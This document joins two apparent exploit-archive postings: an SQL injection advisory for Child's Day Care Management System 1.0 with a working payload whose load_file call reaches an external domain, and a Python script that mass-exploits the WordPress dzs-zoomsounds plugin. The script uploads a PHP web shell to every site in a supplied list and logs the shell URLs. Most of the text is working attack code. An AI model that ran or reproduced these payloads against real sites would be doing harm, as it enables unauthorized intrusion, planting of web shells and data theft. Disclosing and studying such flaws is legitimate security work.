<pre><code>## Title: Child&#39;s Day Care Management System 1.0 SQL - Injection<br />## Author: nu11secur1ty<br />## Date: 12.16.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The &#96;username&#96; in Login.php app, parameter from Child&#39;s Day Care<br />Management System 1.0 appears to be vulnerable to SQL injection<br />attacks.<br />The payload &#39;+(select<br />load_file(&#39;\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd&#39;))+&#39;<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL&#39;s load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. Also, this system is vulnerable to<br />SQL-Injection-Bypass-Authentication<br />and XSS-Stored attacks. The attacker can be receiving all information<br />from the system by using these vulnerabilities! Status: CRITICAL<br /><br />&#91;+&#93; Payload:<br /><br />&#96;&#96;&#96;mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL &gt;&#61; 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username&#61;zCAMOHlX&#39;+(select<br />load_file(&#39;\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd&#39;))+&#39;&#39;<br />AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND<br />&#39;wBYn&#39;&#61;&#39;wBYn&amp;password&#61;a6O!j4g!Z5<br />---<br /><br />&#96;&#96;&#96;<br /><br />## Reproduce:<br />&#91;href&#93;(https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child&#39;s-Day-Care-Management-System)<br /><br />## Proof and Exploit:<br />&#91;href&#93;(https://streamable.com/tvbuoi)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E&#61;<br /> nu11secur1ty &lt;http://nu11secur1ty.com/&gt;<br /></code></pre>

<pre><code># Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)<br /># Google Dork: inurl:wp-content/plugins/dzs-zoomsounds<br /># Date: 16/02/2022<br /># Exploit Author: Overthinker1877 (1877 Team)<br /># Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/<br /># Version: 6.60<br /># Tested on: Windows / Linux<br /><br />import os<br />import requests<br />import threading<br />from multiprocessing.dummy import Pool,Lock<br />from bs4 import BeautifulSoup<br />import time<br />import smtplib,sys,ctypes<br />from random import choice<br />from colorama import Fore<br />from colorama import Style<br />from colorama import init<br />import re<br />import time<br />from time import sleep<br />init(autoreset&#61;True)<br />fr &#61; Fore.RED<br />gr &#61; Fore.BLUE<br />fc &#61; Fore.CYAN<br />fw &#61; Fore.WHITE<br />fy &#61; Fore.YELLOW<br />fg &#61; Fore.GREEN<br />sd &#61; Style.DIM<br />sn &#61; Style.NORMAL<br />sb &#61; Style.BRIGHT<br />Bad &#61; 0<br />Good &#61; 0<br />def Folder(directory):<br /> if not os.path.exists(directory):<br /> os.makedirs(directory)<br />Folder(&quot;exploited&quot;)<br />def clear():<br /> try:<br /> if os.name &#61;&#61; &#39;nt&#39;:<br /> os.system(&#39;cls&#39;)<br /> else:<br /> os.system(&#39;clear&#39;)<br /> except:<br /> pass<br />def finder(i) :<br /> global Bad,Good<br /> head &#61; &#123;&#39;user-agent&#39;: &#39;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36&#39;&#125;<br /> try :<br /> x &#61; requests.session()<br /> listaa &#61; &#91;&#39;/wp-content/plugins/dzs-zoomsounds/savepng.php?location&#61;1877.php&#39;&#93;<br /> for script in listaa :<br /> url &#61; (i+&quot;/&quot;+script)<br /> while True :<br /> req_first &#61; x.get(url, headers&#61;head)<br /> if &quot;error:http raw post data does not exist&quot; in req_first.text :<br /> burp0_headers &#61; &#123;&quot;User-Agent&quot;: &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36&quot;, &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;, &quot;Accept&quot;: &quot;&#42;/&#42;&quot;, &quot;Connection&quot;: &quot;close&quot;&#125;<br /> burp0_data &#61; &quot;&lt;?php\r\nerror_reporting(0);\r\necho(base64_decode(\&quot;T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI&#61;\&quot;));\r\n&#64;copy(&#36;_FILES&#91;&#39;f&#39;&#93;&#91;&#39;tmp_name&#39;&#93;,&#36;_FILES&#91;&#39;f&#39;&#93;&#91;&#39;name&#39;&#93;);\r\necho(\&quot;&lt;a href&#61;\&quot;.&#36;_FILES&#91;&#39;f&#39;&#93;&#91;&#39;name&#39;&#93;.\&quot;&gt;\&quot;.&#36;_FILES&#91;&#39;f&#39;&#93;&#91;&#39;name&#39;&#93;.\&quot;&lt;/a&gt;\&quot;);\r\n?&gt;&quot;<br /> requests.post(url, headers&#61;burp0_headers, data&#61;burp0_data,timeout&#61;45)<br /> urlx &#61; (i+&quot;/&quot;+&quot;/wp-content/plugins/dzs-zoomsounds/1877.php&quot;)<br /> req_second &#61; x.get(urlx, headers&#61;head)<br /> if &quot;Overthinker1877&quot; in req_second.text :<br /> Good &#61; Good + 1<br /> print(fg+&quot;Exploited &quot;+fw+&quot;&gt;&gt; &quot;+fg+&quot; &#61; &quot;+urlx)<br /> with open(&quot;exploited/shell.txt&quot;,&quot;a&quot;) as file :<br /> file.write(urlx+&quot;\n&quot;)<br /> file.close()<br /> else :<br /> Bad &#61; Bad + 1<br /> print(fc+&quot;&quot;+fw+&quot;&#91;&quot;+fr+&quot;X&quot;+fw+&quot;&#93; &quot;+fr+&quot; &quot;+i+&quot; &quot;+fw+&quot; &lt;&lt;&lt; &quot;+fr+&quot; Can&#39;t Exploit&quot;)<br /> else :<br /> Bad &#61; Bad + 1<br /> print(fc+&quot;&quot;+fw+&quot;&#91;&quot;+fr+&quot;X&quot;+fw+&quot;&#93; &quot;+fr+&quot; &quot;+i+&quot; &quot;+fw+&quot; &lt;&lt;&lt; &quot;+fr+&quot; Not Vuln&quot;)<br /><br /> pass<br /> break<br /> except :<br /> pass<br /> if os.name &#61;&#61; &#39;nt&#39;:<br /> ctypes.windll.kernel32.SetConsoleTitleW(&#39;1877Exploit &#124; Exploited-&#123;&#125; &#124; Not Vuln-&#123;&#125;&#39;.format(Good, Bad))<br /> else :<br /> sys.stdout.write(&#39;\x1b&#93;2; 1877Exploit &#124; Exploited-&#123;&#125; &#124; Not Vuln-&#123;&#125;\x07&#39;.format(Good,Bad))<br /><br />def key_logo():<br /> clear &#61; &#39;\x1b&#91;0m&#39;<br /> colors &#61; &#91;36, 32, 34, 35, 31, 37&#93;<br /> x &#61; &#39; &#91; + &#93; OVERTHINKER1877 EXPLOIT&#39;<br /> for N, line in enumerate(x.split(&#39;\n&#39;)):<br /> sys.stdout.write(&#39;\x1b&#91;1;%dm%s%s\n&#39; % (choice(colors), line, clear))<br /> time.sleep(0.05)<br /><br />def process(line):<br /> time.sleep(1)<br /><br /><br />def run() :<br /> key_logo()<br /> clear()<br /> print(&quot;&quot;&quot; <br /> &#91;-&#93; -----------------------------------------&#91;-&#93;<br /> &#91;+&#93; WwW.1877.TeaM<br /> &#91;-&#93; -----------------------------------------&#91;-&#93;<br /> \n \n&quot;&quot;&quot;)<br /> file_name &#61; input(&quot;Website List : &quot;)<br /> op &#61; open(file_name,&#39;r&#39;).read().splitlines()<br /> TEXTList &#61; &#91;list.strip() for list in op&#93;<br /> p &#61; Pool(int(input(&#39;Thread : &#39;)))<br /> p.map(finder, TEXTList)<br /><br />run()<br /> <br /><br /></code></pre>